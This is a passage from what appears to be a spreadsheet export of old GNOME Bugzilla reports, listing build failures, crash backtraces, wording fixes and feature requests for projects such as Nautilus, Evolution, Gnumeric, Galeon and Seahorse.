orbitcpp_simple_seq.h:127:   because of local method `void
_orbitcpp::SimpleUnboundedSeq::length(unsigned
int)' with same name
make[3]: *** [orbitcpp_poa.lo] Error 1
make[3]: Leaving directory `/home/enne/orbitcpp/orbitcpp/orb-cpp'
make[2]: *** [all-recursive] Error 1
make[2]: Leaving directory `/home/enne/orbitcpp/orbitcpp'
make[1]: *** [all-recursive] Error 1
make[1]: Leaving directory `/home/enne/orbitcpp'
make: *** [all] Error 2
Slackware 8.1
gcc 2.95.3
latest gnome 2.0.x packages with ORBit2 2.5.0 and linc 0.7.0</t>
  </si>
  <si>
    <t>VTE-510903</t>
  </si>
  <si>
    <t>use gtk-cursor-blink setting</t>
  </si>
  <si>
    <t>(Continued from gnome-terminal bug 342921.)</t>
  </si>
  <si>
    <t>NAUTILUS-116843</t>
  </si>
  <si>
    <t>show only show redundant in nautilus message</t>
  </si>
  <si>
    <t>#: libnautilus-private/apps_nautilus_preferences.schemas.in.h:28
msgid 
If set to true Nautilus will show only show directories in the tree side 
pane. Otherwise it will show both directories and files.
...will show only show directories... seems redundant. Probably should be
...will only show directories...</t>
  </si>
  <si>
    <t>EVOLUTION-210521</t>
  </si>
  <si>
    <t>signing and encrypting fails to verify signature when mail has attachments</t>
  </si>
  <si>
    <t>Description of Problem:
A mail that has attachments and is both signed and encrypted can be decrypted properly but the signature does not validate any more
Steps to reproduce the problem:
1. new mail
2. attach file
3. sign&amp;encrypt when sending
Actual Results:
...the signature is invalid...
Expected Results:
valid signature it was me sending to myself )
How often does this happen? 
every single time. not when only signing though
Additional Information:
Consider making the message that the signature is invalid bold and red or something it looks pretty much identical to the signature valid message or put a warning sign or something..</t>
  </si>
  <si>
    <t>GNOME-GAMES-SUPERSEDED-101366</t>
  </si>
  <si>
    <t>games fail badly if gconf schemas not installed</t>
  </si>
  <si>
    <t>At least three gnome-games fail miserably if they can't find values
in gconf (gnometris same-gnome and mahjongg).  I discovered this
when I accidently deleted my
/gconf/gconf.xml.defaults/apps directory.
However the problem would also happen if the values got accidently
set to different values or deleted via gconftool-2 etc.
gnometris core dumps with this stack
---
 ff2b2e90 strlen   (1d057 0 ffbfe5d0 0 fef10bb4 0) + 80
 ff3060a4 vsnprintf (ffbfe647 1 1d057 ffbfe750 ff1f1ebc ffbfe664) + 5c
 fef31994 g_printf_string_upper_bound (1d057 ffbfe750 3b 1412c
fef04eb4 5) + 10
 fef3e758 g_strdup_vprintf (1d057 ffbfe750 1cfaf 77830 77830 1cfb2) +
8
 fef3e79c g_strdup_printf (1d057 0 1cfcc 1cfda 0 1) + 1c
 000175ac __1cGTetrisLsetupPixmap6M_v_ (53e70 72a10 39790 0 0 1) + 1c
 000170f4 __1cGTetris2t6Mi_v_ (53e70 0 13950 2d8d8 ff259ad8 53e70) +
46c
 00014834 main     (1cf3d ffbfea54 ffbfea5c 2e000 0 0) + 13c
 000146d0 _start   (0 0 0 0 0 0) + 108
--
same-gnome core dumps with this stack
--
core 'core' of 26675:	same-gnome
 00012d58 ???????? (1 24800 0 24e9c 4 8)
 00012e4c ???????? (5efb0 5efb0 39790 0 0 24800)
 00013ff8 main     (14000 14400 5ee60 6d668 14400 25400) + 44c
 000121bc _start   (0 0 0 0 0 0) + 108
--
And mahjongg comes up with tiles that have no images on them.
Since these games are completely non-functional when they cannot find
values in the gconf database it would be nice if they spit out 
reasonable message like I can't run because the default background
color (or whatever) can't be found in the gconf database rather than
core dumping or coming up in an unusable state.
You could easily recreate this by just renaming the
/gconf/gconf.xml.defaults/apps directory to something
else while debugging.</t>
  </si>
  <si>
    <t>LIBGSF-346118</t>
  </si>
  <si>
    <t>MS OLE2 &amp; Properties</t>
  </si>
  <si>
    <t>DOC file not correctly parsed</t>
  </si>
  <si>
    <t>This started as AbiWord bug 10317 (http://bugzilla.abisource.com/show_bug.cgi?id=10317). Reporter was 'simsong@acm.org'.
---
I have some word files that were generated by FrameMaker 6.0 on Windows.
AbiWord won't open them. Microsoft Word 2003 opens them just fine. wvText
generates the error could not convert into HTML.  wvWare generates this
interesting error:
% wvWare /home/simsong/arch/books/2001.WSCP/appb.doc 
(process:79817): libgsf:msole-WARNING **: There is are not supposed to be any
blocks in the small block allocation table yet there is a link to some. 
Ignoring it.
(process:79817): libgsf:msole-WARNING **: A non directory stream with children
?
[simsong@s dfrws] % 
I have put a copy of this document at http://www.simson.net/appb.doc</t>
  </si>
  <si>
    <t>AT-SPI-125691</t>
  </si>
  <si>
    <t>wrong description of JVM menus</t>
  </si>
  <si>
    <t>using a gnome-2.4 build from 24/10/03
using jre1.4.2_02 linked to gnome-2.4 accessibility .jars
-launch gnopernicus with speech enabled
-launch Java Media Player
-press F10
.gnopernicus reports 'root pane' instead of 'menu 6 items'
-repeat the above with 'Alt-F'
.gnopernicus reports 'root pane' instead of 'menu 6 items'
.the same is apparent for 'Alt-P' the 'Player' menu.</t>
  </si>
  <si>
    <t>GLIB-61573</t>
  </si>
  <si>
    <t>glib-config still mentioned in documentation</t>
  </si>
  <si>
    <t>replace glib-config --libs gmodule/gthread by
pkg-config --libs gmodule-2.0/gthread-2.0
in glib/docs/reference/glib/{modulesthreads}.sgml</t>
  </si>
  <si>
    <t>EVINCE-347213</t>
  </si>
  <si>
    <t>Scrolling across page boundary is jerky</t>
  </si>
  <si>
    <t>Please describe the problem:
Using the mouse wheel (while in 'Fit page width' mode) to scroll down across a page boundary can cause a quick jump to place the next page at the top. This happens when the next use of the scroll wheel will cause evince to scroll slightly past the top of the next page but then the page suddenly jumps back up to the top.
Steps to reproduce:
1. Open a multi-page PDF in 'Fit page width' mode
2. Scroll down slowly onto the second page
3. As the page changes over watch for sudden movement
--
4. If it doesn't occur try resizing the window vertically so that the display is not a whole number of scrolls high (just move it a bit and try again)
Actual results:
As the page changes over the top of the second page is scrolled past slightly but then the page jumps suddenly to be aligned at the top.
Expected results:
One of two behaviours:
1) Don't make the page jump back up. If the top of the next page is scrolled past a few pixels don't do anything. Or:
2) When a scroll event is detected immediately align the next page to the top instead of letting it scroll past first (This avoids the 'flash' as the display quickly over-corrects).
Does this happen every time?
Only when the top of the next page is not a whole number of scrolls away. Since if the top of the next page is already aligned with the window you don't see any effect.
Other information:</t>
  </si>
  <si>
    <t>SOUND-JUICER-519150</t>
  </si>
  <si>
    <t>Genre names should be localizable</t>
  </si>
  <si>
    <t>Please describe the problem:
Currently the list of known genres located in src/sj-genres.c is a fixed list of English names which cannot be localized. It should be modified to use gettext so that non-English users can get a list of stock genres in their own language.
Steps to reproduce:
Actual results:
Expected results:
Does this happen every time?
Other information:</t>
  </si>
  <si>
    <t>vfaronov</t>
  </si>
  <si>
    <t>SEAHORSE-334275</t>
  </si>
  <si>
    <t>Crashes on startup</t>
  </si>
  <si>
    <t xml:space="preserve">Distribution: Debian testing/unstable
Package: seahorse
Severity: Normal
Version: GNOME2.12.2 0.8
Gnome-Distributor: Debian
Synopsis: Crashes on startup
Bugzilla-Product: seahorse
Bugzilla-Component: general
Bugzilla-Version: 0.8
BugBuddy-GnomeVersion: 2.0 (2.12.1)
Description:
Seahorse crashes on startup.
Steps to reproduce the crash:
1.  Run nautilus
2.  Double click on a *.gpg (symetrically encrypted file).
3.  Watch it not work.
Expected Results:
 I expected to be prompted for a password and for the file to be
unencryptred using that password.
How often does this happen?
 Whenever I try it.
Additional Information:
Debugging Information:
Backtrace was generated from '/usr/bin/seahorse'
(no debugging symbols found)
Using host libthread_db library /lib/libthread_db.so.1.
(no debugging symbols found)
[Thread debugging using libthread_db enabled]
[New Thread 16384 (LWP 1742)]
[New Thread 32769 (LWP 1758)]
[New Thread 16386 (LWP 1759)]
(no debugging symbols found)
0x40a412cb in waitpid () from /lib/libpthread.so.0
#0  0x40a412cb in waitpid () from /lib/libpthread.so.0
#1  0x400db470 in ?? () from /usr/lib/libgnomeui-2.so.0
#2  0x00000000 in ?? ()
Thread 3 (Thread 16386 (LWP 1759)):
#0  0x40a3c184 in __pthread_sigsuspend () from /lib/libpthread.so.0
No symbol table info available.
#1  0x40a3af59 in __pthread_wait_for_restart_signal ()
   from /lib/libpthread.so.0
No symbol table info available.
#2  0x40a3857c in pthread_cond_wait@GLIBC_2.0 () from
/lib/libpthread.so.0
No symbol table info available.
#3  0x4065b865 in _gnome_vfs_thread_pool_init ()
   from /usr/lib/libgnomevfs-2.so.0
No symbol table info available.
#4  0x409f0a71 in g_static_private_free () from
/usr/lib/libglib-2.0.so.0
No symbol table info available.
#5  0x40a38f4c in pthread_start_thread () from /lib/libpthread.so.0
No symbol table info available.
#6  0x40b3f80a in clone () from /lib/libc.so.6
No symbol table info available.
Thread 2 (Thread 32769 (LWP 1758)):
#0  0x40b36386 in poll () from /lib/libc.so.6
No symbol table info available.
#1  0x40a39514 in __pthread_manager () from /lib/libpthread.so.0
No symbol table info available.
#2  0x40b3f80a in clone () from /lib/libc.so.6
No symbol table info available.
Thread 1 (Thread 16384 (LWP 1742)):
#0  0x40a412cb in waitpid () from /lib/libpthread.so.0
No symbol table info available.
#1  0x400db470 in ?? () from /usr/lib/libgnomeui-2.so.0
No symbol table info available.
#2  0x00000000 in ?? ()
No symbol table info available.
#0  0x40a412cb in waitpid () from /lib/libpthread.so.0
------- Bug created by bug-buddy at 2006-03-12 01:54 -------
Unknown version 0.8 in product seahorse.  Setting version to unspecified.
</t>
  </si>
  <si>
    <t>GNUMERIC-524178</t>
  </si>
  <si>
    <t>failure to save chart in JPEG or PNG format ok on restart</t>
  </si>
  <si>
    <t>Graph created in Gnumeric saved ok in SVG format.  Graphic could not be saved in either JPEG or PNG formats.  Program returned error via dialog box:
Unknown failure while saving image
zero byte file created by unsuccessful save image attempt.
Program then became unresponsive:  white cross cursor showed but could not click on anything.
Restarted and image saved without any problem.  Possibly a lack of memory issue??
OS = Windows XP Pro 2002 edition SP2</t>
  </si>
  <si>
    <t>austin.andrew</t>
  </si>
  <si>
    <t>LIBRSVG-334813</t>
  </si>
  <si>
    <t>rsvg-convert crashes</t>
  </si>
  <si>
    <t>Steps to reproduce:
./rsvg-convert -f pdf -o by.pdf byncnd-es.svg
librsvg-ERROR **: Unknown output format.
aborting...
Aborted (core dumped)
Stack trace:
Other information:</t>
  </si>
  <si>
    <t>GNUMERIC-513551</t>
  </si>
  <si>
    <t>Null pointer crash in excel_set_xf()</t>
  </si>
  <si>
    <t>Version: r16323
OS: Ubuntu Gutsy
The upcoming sample is a fuzzed version of operator.xls.
Steps to reproduce:
- Load the upcoming attachment in Gnumeric to trigger a crash
Backtrace:
Program received signal SIGSEGV Segmentation fault.
[Switching to Thread -1232222544 (LWP 5273)]
0xb6565d53 in excel_set_xf (esheet=0x828ede0 q=0x82c1bd0) at ms-excel-read.c:1862
1862            guint16 const col    = XL_GETCOL (q)
(gdb) p q-&gt;data
$1 = (guint8 *) 0x0
(gdb) p q-&gt;length
$2 = 0
(gdb) bt
#0  0xb6565d53 in excel_set_xf (esheet=0x828ede0 q=0x82c1bd0) at ms-excel-read.c:1862
#1  0xb6572b37 in excel_read_sheet (q=0x82c1bd0 importer=0x82b1180 wb_view=0x82ae010 
    esheet=0x828ede0) at ms-excel-read.c:5770
#2  0xb65740fb in excel_read_BOF (q=0x82c1bd0 importer=0x82b1180 wb_view=0x82ae010 
    context=0x8272850 version=0xbf94264c current_sheet=0xbf942648) at ms-excel-read.c:6249
#3  0xb657483d in excel_read_workbook (context=0x8272850 wb_view=0x82ae010 
    input=0x82a1e58 is_double_stream_file=0xbf942690) at ms-excel-read.c:6317
#4  0xb6559889 in excel_file_open (fo=0x826b320 context=0x8272850 wbv=0x82ae010 
    input=0x80fe390) at boot.c:191
#5  0xb7914446 in go_plugin_loader_module_func_file_open (fo=0x826b320 service=0x828a6e8 
    io_context=0x8272850 FIXME_FIXME_workbook_view=0x82ae010 input=0x80fe390)
    at go-plugin-loader-module.c:239
#6  0xb7915ec8 in go_plugin_file_opener_open (fo=0x826b320 unused_enc=0x0 
    io_context=0x8272850 FIXME_FIXME_workbook_view=0x82ae010 input=0x80fe390)
    at go-plugin-service.c:476
#7  0xb7918818 in go_file_opener_open (fo=0x826b320 opt_enc=0x0 io_context=0x8272850 
    FIXME_workbook_view=0x82ae010 input=0x80fe390) at file.c:294
#8  0xb7c80f43 in wb_view_new_from_input (input=0x80fe390 optional_fmt=0x826b320 
    io_context=0x8272850 optional_enc=0x0) at workbook-view.c:1212
#9  0xb7c810ee in wb_view_new_from_uri (
    uri=0x82ac9e0 file:///home/s/Desktop/5-operator.xls optional_fmt=0x0 
    io_context=0x8272850 optional_enc=0x0) at workbook-view.c:1264
#10 0x0804c1b5 in main (argc=2 argv=0xbf942904) at main-application.c:395</t>
  </si>
  <si>
    <t>GNOME-VFS-45740</t>
  </si>
  <si>
    <t>no application for opening vcard/vcal files</t>
  </si>
  <si>
    <t xml:space="preserve">we need an application for opening vcard/vcal files. apparently evolution can do
it but is it there yet?
------- Additional Comments From darin@bentspoon.com 2001-01-17 17:47:08 ----
While it's not really the Nautilus mission to ship applications and viewers as part of 
the base Nautilus package we might some day decide we want to collect a nice set 
so rather than just close these outright I'm deferring them.
------- Additional Comments From don@eazel.com 2001-01-18 22:58:54 ----
I actually asked Aaron to open this specific application missing bug so we
could close a single older and much broader bug that just kept staying open.
I think the task here is to either pick an existing application to handle these
mime types or decide to not handle the specific type at all.  And it's good to
have a bug to document that descision.  I'm putting this on Aaron's plate for
1.0.
------- Additional Comments From mjs@noisehavoc.org 2001-01-22 19:42:16 ----
I think gnomecal can do it. So can evolution we could prioritize that higher to
be friendly and support it whenever it does ship.
I don't think this is 1.0 critical though.
------- Additional Comments From don@eazel.com 2001-02-16 00:42:31 ----
Agreed.  Not a 1.0 blocker.
------- Bug moved to this database by unknown@bugzilla.gnome.org 2001-09-09 20:53 -------
</t>
  </si>
  <si>
    <t>PYGOBJECT-353039</t>
  </si>
  <si>
    <t>Failure in signal emission during do_set_property invoked from constructor</t>
  </si>
  <si>
    <t>Like the subject says.</t>
  </si>
  <si>
    <t>GNOME-PANEL-134977</t>
  </si>
  <si>
    <t>PanelAppletFlags is missing it's PANEL_TYPE_APPLET_FLAGS</t>
  </si>
  <si>
    <t>panel-applet.h needs PANEL_TYPE_APPLET_FLAGS 
defined.  Without it pygnome can't produce 
wrappers for panel_applet_get_flags() and 
panel_applet_set_flags(). 
Note that the current Applet.flags() and 
Applet.set_flags() functions it provides are 
actually the gobject functions that have been 
inherited.</t>
  </si>
  <si>
    <t>GALEON-95801</t>
  </si>
  <si>
    <t>startup crash</t>
  </si>
  <si>
    <t xml:space="preserve">Package: galeon
Severity: critical
Version: 1.2.99
Synopsis: startup crash
Bugzilla-Product: galeon
Bugzilla-Component: general
BugBuddy-GnomeVersion: 2.0 (2.0.5)
Description:
Description of Problem:
crash on startup
Steps to reproduce the problem:
1.  start galeon
2. 
3. 
Actual Results:
immediate crash
Expected Results:
How often does this happen?
every time
Additional Information:
Debugging Information:
Backtrace was generated from '/usr/bin/galeon-bin'
[New Thread 1024 (LWP 4571)]
[New Thread 2049 (LWP 4574)]
[New Thread 1026 (LWP 4575)]
[New Thread 2051 (LWP 4576)]
[New Thread 3076 (LWP 4577)]
0x40c45089 in __wait4 () at __wait4:-1
	in __wait4
#0  0x40c45089 in __wait4 () at __wait4:-1
#1  0x40cbfde0 in __DTOR_END__ () from /lib/libc.so.6
#2  0x401717aa in waitpid (pid=4578 stat_loc=0xbffff244 options=0)
    at wrapsyscall.c:173
#3  0x4026eef3 in libgnomeui_module_info_get ()
   from /usr/lib/libgnomeui-2.so.0
#4  0x4016f144 in pthread_sighandler (signo=11 ctx=
      {gs = 0 __gsh = 0 fs = 0 __fsh = 0 es = 43 __esh = 0 ds =
43 __dsh = 0 edi = 137264792 esi = 0 ebp = 3221222904 esp =
3221222884 ebx = 135328088 edx = 135187712 ecx = 0 eax = 136439752
trapno = 14 err = 4 eip = 134796651 cs = 35 __csh = 0 eflags =
2163202 esp_at_signal = 3221222884 ss = 43 __ssh = 0 fpstate =
0xbffff368 oldmask = 2147483648 cr2 = 0})
    at signals.c:97
#5  
#6  0x0808d56b in galeon_embed_load_url (embed=0x0 url=0x0)
    at galeon-embed.c:287
#7  0x08078e42 in galeon_shell_new_tab (shell=0x8149920
parent_window=0x0 
    previous_tab=0x0 url=0x0 flags=GALEON_NEW_TAB_HOMEPAGE)
    at galeon-shell.c:435
#8  0x0807849b in impl_galeon_automation_loadurl (_servant=0x8376964 
    url=0x80ebf6c  geometry=0x80ebf6c  fullscreen=0 '\0' 
    open_in_existing_tab=0 '\0' open_in_new_window=0 '\0' 
    open_in_new_tab=0 '\0' raise=1 '\001' ev=0x8110770)
    at galeon-automation.c:138
#9  0x08073a59 in GNOME_GaleonAutomation_loadurl (_obj=0x0
url=0x80ebf6c  
    geometry=0x80ebf6c  fullscreen=0 '\0' open_in_existing_tab=0
'\0' 
    open_in_new_tab=0 '\0' open_in_new_window=0 '\0' raise=1 '\001' 
    ev=0x8110770) at GaleonAutomation-stubs.c:28
#10 0x08078112 in galeon_main_start (data=0x0) at galeon-main.c:222
#11 0x40a8adce in g_idle_dispatch () from /usr/lib/libglib-2.0.so.0
#12 0x40a885eb in g_main_dispatch () from /usr/lib/libglib-2.0.so.0
#13 0x40a8943a in g_main_context_dispatch () from
/usr/lib/libglib-2.0.so.0
#14 0x40a89817 in g_main_context_iterate () from
/usr/lib/libglib-2.0.so.0
#15 0x40a89f30 in g_main_loop_run () from /usr/lib/libglib-2.0.so.0
#16 0x406e5998 in bonobo_main () from /usr/lib/libbonobo-2.so.0
#17 0x08077fcb in main (argc=1 argv=0xbffff964) at galeon-main.c:158
#18 0x40bbb17d in __libc_start_main (main=0x8077ea0  argc=1 
    ubp_av=0xbffff964 init=0x806f92c  fini=0x80ea094  
    rtld_fini=0x4000a534  stack_end=0xbffff95c)
    at ../sysdeps/generic/libc-start.c:129
Thread 5 (Thread 3076 (LWP 4577)):
#0  0x40bcc3f5 in __sigsuspend (set=0xbf3ff984)
    at ../sysdeps/unix/sysv/linux/sigsuspend.c:54
	resultvar = 4294967292
	saved_errno = 4
#1  0x4016ea4f in __pthread_wait_for_restart_signal (self=0xbf3ffc00)
    at pthread.c:1004
	self = 0xbf3ffc00
	mask = {__val = {0 0 137741452 3076 3208640932 1075141869 
    1074982256 0 3208640980 1075251534 1075292860 137943256
137943356 
    1074698918 3208641060 1073782336 137741448 1075100855
137741312 
    137979344 3208641028 1075237667 137943272 0 137943356
1075237481 
    1075292860 0 3208641044 1075251010 1075292860 137943256}}
#2  0x4016b0e2 in pthread_cond_wait (cond=0x838d93c mutex=0x838d8d8)
    at restart.h:36
	cond = (pthread_cond_t *) 0x0
	self = 0xbf3ffc00
	extr = {pu_object = 0x838d93c 
  pu_extricate_func = 0x4016ae90 }
	already_canceled = 0
	spurious_wakeup_count = 0
#3  0x40155ac1 in PR_WaitCondVar () from /usr/lib/libnspr4.so
No symbol table info available.
#4  0x400efe34 in TimerThread::Run() () from /usr/lib/libxpcom.so
No symbol table info available.
#5  0x400ec876 in nsThread::Main(void*) () from /usr/lib/libxpcom.so
No symbol table info available.
#6  0x4015a651 in PR_Select () from /usr/lib/libnspr4.so
No symbol table info available.
#7  0x4016c10c in pthread_start_thread (arg=0xbf3ffc00) at
manager.c:291
	self = 0xbf3ffc00
	request = {req_thread = 0x0 req_kind = REQ_CREATE req_args = {
    create = {attr = 0x0 fn = 0 arg = 0x0 mask = {__val = {
          0 }}} free = {thread_id = 0} exit = {code
= 0} 
    post = 0x0 for_each = {fn = 0 arg = 0x0}}}
	outcome = (void *) 0xfffffffc
Thread 4 (Thread 2051 (LWP 4576)):
#0  0x40bcc3f5 in __sigsuspend (set=0xbf5ff964)
    at ../sysdeps/unix/sysv/linux/sigsuspend.c:54
	resultvar = 4294967292
	saved_errno = 0
#1  0x4016ea4f in __pthread_wait_for_restart_signal (self=0xbf5ffc00)
    at pthread.c:1004
	self = 0xbf5ffc00
	mask = {__val = {0 0 137837680 0 1075216600 1073990080 0 0 0 
    1075251534 1075292860 137024600 137024700 1075028992
1073989584 0 
    0 65 135431072 6 3210738148 1075237667 137024616 0
137024700 
    1075237481 1075292860 0 3210738180 1075237795 1087101600 
    1073781714}}
#2  0x4016b0e2 in pthread_cond_wait (cond=0x82ad4bc mutex=0x82ad458)
    at restart.h:36
	cond = (pthread_cond_t *) 0x0
	self = 0xbf5ffc00
	extr = {pu_object = 0x82ad4bc 
  pu_extricate_func = 0x4016ae90 }
	already_canceled = 0
	spurious_wakeup_count = 0
#3  0x40155ac1 in PR_WaitCondVar () from /usr/lib/libnspr4.so
No symbol table info available.
#4  0x4118114d in NSGetModule ()
   from /usr/lib/mozilla-1.1/components/libnecko.so
No symbol table info available.
#5  0x41180c0b in NSGetModule ()
   from /usr/lib/mozilla-1.1/components/libnecko.so
No symbol table info available.
#6  0x400ec876 in nsThread::Main(void*) () from /usr/lib/libxpcom.so
No symbol table info available.
#7  0x4015a651 in PR_Select () from /usr/lib/libnspr4.so
No symbol table info available.
#8  0x4016c10c in pthread_start_thread (arg=0xbf5ffc00) at
manager.c:291
	self = 0xbf5ffc00
	request = {req_thread = 0x0 req_kind = REQ_CREATE req_args = {
    create = {attr = 0x0 fn = 0 arg = 0x0 mask = {__val = {
          0 }}} free = {thread_id = 0} exit = {code
= 0} 
    post = 0x0 for_each = {fn = 0 arg = 0x0}}}
	outcome = (void *) 0xfffffffc
Thread 3 (Thread 1026 (LWP 4575)):
#0  0x40c6dfc3 in __poll (fds=0xbf7ff86c nfds=1 timeout=35000)
    at ../sysdeps/unix/sysv/linux/poll.c:52
	resultvar = 4294967292
	errno_saved = 4
	timeout = 35000
	must_emulate = 0
#1  0x40159284 in PR_OpenDir () from /usr/lib/libnspr4.so
No symbol table info available.
#2  0x41177432 in NSGetModule ()
   from /usr/lib/mozilla-1.1/components/libnecko.so
No symbol table info available.
#3  0x400ec876 in nsThread::Main(void*) () from /usr/lib/libxpcom.so
No symbol table info available.
#4  0x4015a651 in PR_Select () from /usr/lib/libnspr4.so
No symbol table info available.
#5  0x4016c10c in pthread_start_thread (arg=0xbf7ffc00) at
manager.c:291
	self = 0xbf7ffc00
	request = {req_thread = 0x0 req_kind = REQ_CREATE req_args = {
    create = {attr = 0x0 fn = 0 arg = 0x0 mask = {__val = {
          0 }}} free = {thread_id = 0} exit = {code
= 0} 
    post = 0x0 for_each = {fn = 0 arg = 0x0}}}
	outcome = (void *) 0xfffffffc
Thread 2 (Thread 2049 (LWP 4574)):
#0  0x40c6dfc3 in __poll (fds=0x82ac208 nfds=1 timeout=2000)
    at ../sysdeps/unix/sysv/linux/poll.c:52
	resultvar = 4294967292
	errno_saved = 0
	timeout = 2000
	must_emulate = 0
#1  0x4016bdd0 in __pthread_manager (arg=0x14) at manager.c:142
	reqfd = 20
	ufd = {fd = 20 events = 1 revents = 0}
	manager_mask = {__val = {4294967279 4294967294 
    4294967295 }}
	n = 0
	request = {req_thread = 0x40178080 req_kind = REQ_CREATE 
  req_args = {create = {attr = 0xbfffbf60 fn = 0x4015a5bc
      arg = 0x838d9d0 mask = {__val = {2147483648 0 1087110624 
          1087100544 0 1075251534 1075292860 135699040 137943504 
          1086403668 137943648 0 44 1086403187 1075199080 40 
          3221208840 1075237667 135699056 0 3221208840 1075237481
          1075199080 135699040 137943504 1075098882 1 40
3221208872 
          1075140529 135699040 1024}}} free = {thread_id =
3221208928} 
    exit = {code = -1073758368} post = 0xbfffbf60 for_each = {
      fn = 0xbfffbf60 arg = 0x4015a5bc}}}
Thread 1 (Thread 1024 (LWP 4571)):
#0  0x40c45089 in __wait4 () at __wait4:-1
No locals.
#1  0x40cbfde0 in __DTOR_END__ () from /lib/libc.so.6
No symbol table info available.
#2  0x401717aa in waitpid (pid=4578 stat_loc=0xbffff244 options=0)
    at wrapsyscall.c:173
	stat_loc = (int *) 0xbffff244
	options = 0
	result = 0
	oldtype = 0
#3  0x4026eef3 in libgnomeui_module_info_get ()
   from /usr/lib/libgnomeui-2.so.0
No symbol table info available.
#4  0x4016f144 in pthread_sighandler (signo=11 ctx=
      {gs = 0 __gsh = 0 fs = 0 __fsh = 0 es = 43 __esh = 0 ds =
43 __dsh = 0 edi = 137264792 esi = 0 ebp = 3221222904 esp =
3221222884 ebx = 135328088 edx = 135187712 ecx = 0 eax = 136439752
trapno = 14 err = 4 eip = 134796651 cs = 35 __csh = 0 eflags =
2163202 esp_at_signal = 3221222884 ss = 43 __ssh = 0 fpstate =
0xbffff368 oldmask = 2147483648 cr2 = 0})
    at signals.c:97
	self = 0x40178080
	in_sighandler = 0x0
#5  
No locals.
#6  0x0808d56b in galeon_embed_load_url (embed=0x0 url=0x0)
    at galeon-embed.c:287
	klass = (struct GaleonEmbedClass *) 0xfffffe00
#7  0x08078e42 in galeon_shell_new_tab (shell=0x8149920
parent_window=0x0 
    previous_tab=0x0 url=0x0 flags=GALEON_NEW_TAB_HOMEPAGE)
    at galeon-shell.c:435
	window = (struct GaleonWindow *) 0x82e7e98
	tab = (struct GaleonTab *) 0x82cf2a8
	embed = (struct _GaleonEmbed *) 0x0
	after_current = 137979760
	in_new_window = 137979760
	jump_to = 0
#8  0x0807849b in impl_galeon_automation_loadurl (_servant=0x8376964 
    url=0x80ebf6c  geometry=0x80ebf6c  fullscreen=0 '\0' 
    open_in_existing_tab=0 '\0' open_in_new_window=0 '\0' 
    open_in_new_tab=0 '\0' raise=1 '\001' ev=0x8110770)
    at galeon-automation.c:138
	flags = GALEON_NEW_TAB_HOMEPAGE
	load_page = 0x0
	window = (struct GaleonWindow *) 0xfffffe00
	session = (struct Session *) 0x82e22a8
#9  0x08073a59 in GNOME_GaleonAutomation_loadurl (_obj=0x0
url=0x80ebf6c  
    geometry=0x80ebf6c  fullscreen=0 '\0' open_in_existing_tab=0
'\0' 
    open_in_new_tab=0 '\0' open_in_new_window=0 '\0' raise=1 '\001' 
    ev=0x8110770) at GaleonAutomation-stubs.c:28
	_ORBIT_retval = 255 '
------- Bug moved to this database by unknown@bugzilla.gnome.org 2002-10-15 06:02 -------
Unknown version 1.2.x in product galeon. Setting version to the default unspecified.
The original reporter (jo@our-own.net) of this bug does not have an account here.
Reassigning to the exporter unknown@bugzilla.gnome.org.
Reassigning to the default owner of the component galeon-maint@bugzilla.gnome.org.
</t>
  </si>
  <si>
    <t>jo</t>
  </si>
  <si>
    <t>GTKHTML-254741</t>
  </si>
  <si>
    <t>Build fails in components/html-editor/</t>
  </si>
  <si>
    <t>Please fill in this template when reporting a bug unless you know what you are doing.
Description of Problem:
Steps to reproduce the problem:
1. Pull gtkhtml from gnome cvs HEAD
2. ./autogen.sh
3. make
Actual Results:
The build gets caught in components/html-editor/ doing the following:
make[3]: Circular GNOME_GtkHTML_Editor.server.in &lt;- Makefile dependency dropped.
cd ../.. \
  &amp;&amp; CONFIG_FILES=components/html-editor/Makefile CONFIG_HEADERS= /bin/sh ./
config.status
config.status: creating components/html-editor/Makefile
config.status: executing default-1 commands
config.status: executing default-2 commands
config.status: executing default-3 commands
Expected Results:
Not this! :)
How often does this happen? 
Every time. I haven't worked out how to get around this.
Additional Information:
The rest of my system is built against CVS (GNOME 2.5.x)</t>
  </si>
  <si>
    <t>tonyarnold</t>
  </si>
  <si>
    <t>SEAHORSE-444259</t>
  </si>
  <si>
    <t>Seahorse do not build against gnupg 2.0</t>
  </si>
  <si>
    <t>Please describe the problem:
In configure.in it is only mentioned gnupg 1.2 and 1.4. On webpage you have mentioned 2.0 as well. It builds ok with gnupg 2.0.
If:
- It works with gnupg 2.0: Please add it to configure.in
- It do not work with gnupg 2.0: Please add support to it
Steps to reproduce:
Actual results:
Expected results:
Does this happen every time?
Other information:</t>
  </si>
  <si>
    <t>GNOME-APPLETS-139949</t>
  </si>
  <si>
    <t>Preferences dialog: various suggestions</t>
  </si>
  <si>
    <t>Description of Problem:
The Disk Mounter Preferences dialog should be
improved.
Steps to reproduce the problem:
1. Add the Disk Mounter applet to a panel:
   Right-click on the panel then choose Add to
Panel &gt; Utility &gt; Disk Mounter.
2. Right-click on the applet then choose
Preferences.
   The Disk Mounter Preferences dialog is
displayed.
Actual Results:
1. In the Icon drop-down list: 
   Cdrom and Cd Recorder
2. Two buttons: No Icon
3. Eject disk when unmounting
4. Use automount friendly status test
Expected Results:
1. In the Icon drop-down list: 
   CDROM and CD Recorder
   (that is uppercase letters for initials)
2. Two buttons: No icon
   (that is lowercase i)
3. Eject disk when unmounted
   (that is avoid the gerund -ing where
possible)
4. Use automount-friendly status test
   (that is insert a hyphen)
How often does this happen? 
Every time.
Additional Information:
Disk Mounter applet version 2.5.5.</t>
  </si>
  <si>
    <t>TOTEM-457081</t>
  </si>
  <si>
    <t>use C++ casts</t>
  </si>
  <si>
    <t>instead of NS_*_CAST which are going to be removed in gecko trunk [https://bugzilla.mozilla.org/show_bug.cgi?id=348748] .</t>
  </si>
  <si>
    <t>NAUTILUS-90152</t>
  </si>
  <si>
    <t>Input methods don't work during file rename</t>
  </si>
  <si>
    <t>Should support input methods in the file rename 
entry box.
See https://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=70684</t>
  </si>
  <si>
    <t>GOSSIP-316172</t>
  </si>
  <si>
    <t>Composing message triggers new message notification</t>
  </si>
  <si>
    <t>[From bugs.debian.org/327881]
Since I upgraded to 0.9 Gossip has been firing off the 'new message' sound +
flashing notification area icon seemingly at random while talking to
another Jabber user. Today I found about LM_DEBUG=ALL and discovered that this
is what is triggering the event:
RECV [161]:
-----------------------------------
'&lt;message xmlns='jabber:client' to='sam@robots.org.uk/home'
from='XXXXXXXXXXXXXXXX@jabber.org/Home'&gt;
'
-----------------------------------
*** Read: 161 chars
LM-PARSER: ATTRIBUTE: xmlns = jabber:client
